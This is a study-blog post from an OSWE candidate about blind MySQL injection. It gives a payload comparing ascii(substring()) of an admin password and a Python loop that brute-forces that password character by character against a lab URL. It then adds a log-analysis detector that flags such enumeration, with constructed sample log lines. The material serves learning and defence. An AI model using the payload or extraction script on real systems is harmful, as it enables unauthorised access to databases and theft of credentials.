My AWAE lab just ended today, with 3 days left to go before my OSWE exam. I've been living under stress for almost 8 months, before the course and during it as well.
Just one word for OSWE: "amazing". I won't say much about the course, because many people out there have already shared their thoughts in detail. The thing I learned from the AWAE course is MySQL injection, especially the blind kind, because it's more advanced and extracting the data is much harder than with classic SQLi.
I've been trying to find the fastest way to extract data from the database in blind SQLi cases. Wandering around the exploit-db papers, I found an interesting topic I had not learned yet: "Faster Blind MySQL Injection Using Bit Shifting". I read through the paper and wanted to write a script for it to improve my brute-force mechanism.
The trivial way to extract the data is to use the substring or substr function. For example, we have a simple payload:
test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='
If the injected condition is true, the response's Content-Length header will be greater than 20; otherwise it will not.
Usually, what we do is brute-force each character of the password in turn, comparing the ascii() value of that character with every candidate ASCII decimal code.
Type man ascii to see the table.
So the Python code would be:
import requests

def extract_password():
    password = ""
    for i in range(1, 8):  # position of the character to recover
        injection_string = "test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='" % i
        for j in range(32, 127):  # every possible character in the ASCII printable set
            target = "http://kubertu/index_public.php?q=%s" % injection_string.replace("[CHAR]", str(j))
            r = requests.get(target)
            content_length = int(r.headers['Content-Length'])
            if content_length > 20:  # true branch: this candidate is the character
                password += chr(j)
                break
    return password
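Seen from the other side of the wire, a loop like the one above is very noisy: for one character it sends up to 95 requests that differ only in the compared number. The following detector is an added example (not code from this post or from the AWAE course) that pulls blind-SQLi enumeration out of web server access logs. It assumes combined-log-format lines; the client addresses and log lines below are constructed, not taken from any real target. Requests that contain an ascii(substring(...)) oracle are collapsed to a template by replacing every numeric literal with a placeholder, and a client is flagged once it has sent more than a threshold of distinct variants of the same template.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined-log style (hypothetical hosts and paths):
# client 10.0.0.5 runs a blind SQLi loop that changes only the compared ASCII
# value, answering "true" (longer body) only for 65; client 10.0.0.9 is ordinary traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:%02d +0000] "GET /index_public.php?q=test%%27+or+'
    '(ascii(substring((select+password+from+admin),1,1)))%%3D%d+or+1%%3D%%27 HTTP/1.1" 200 %d'
    % (n, 32 + n, 35 if 32 + n == 65 else 18)
    for n in range(0, 40)
] + [
    '10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index_public.php?q=apple HTTP/1.1" 200 120',
    '10.0.0.9 - - [01/Jan/2024:10:01:05 +0000] "GET /index_public.php?q=pear HTTP/1.1" 200 98',
]

# Combined log format: client, identd, user, [time], "METHOD path proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) (?P<size>\d+)'
)
# The character-by-character oracle the post describes: ascii(substring(...)) / ascii(substr(...)).
ORACLE_RE = re.compile(r'ascii\s*\(\s*substr(?:ing)?\s*\(', re.IGNORECASE)


def normalize(query):
    # Replace every numeric literal with a placeholder so requests that differ only
    # in the probed position or the compared value collapse to a single template.
    return re.sub(r'\d+', '#', query)


def detect_blind_sqli(lines, threshold=10):
    # (client, template) -> set of distinct numeric-literal tuples seen for it
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = unquote_plus(m.group('path'))  # decode %27, %3D and '+' back to the raw payload
        query = path.split('?', 1)[1] if '?' in path else ''
        if not ORACLE_RE.search(query):
            continue
        template = normalize(query)
        literals = tuple(re.findall(r'\d+', query))
        seen[(m.group('ip'), template)].add(literals)

    alerts = []
    for (ip, template), variants in seen.items():
        if len(variants) >= threshold:
            alerts.append({'client': ip, 'template': template, 'requests': len(variants)})
    return alerts


if __name__ == '__main__':
    for alert in detect_blind_sqli(SAMPLE_LOG):
        print('%(client)s sent %(requests)d variants of: %(template)s' % alert)
```

The threshold of 10 distinct variants fires long before the loop has walked all 95 printable candidates, and because the template keeps the oracle text, the alert tells the responder which query and which column are being read. The same normalisation works on a WAF's request log; if the oracle is moved into a POST body or a header, the body or header would need to be parsed instead of the path.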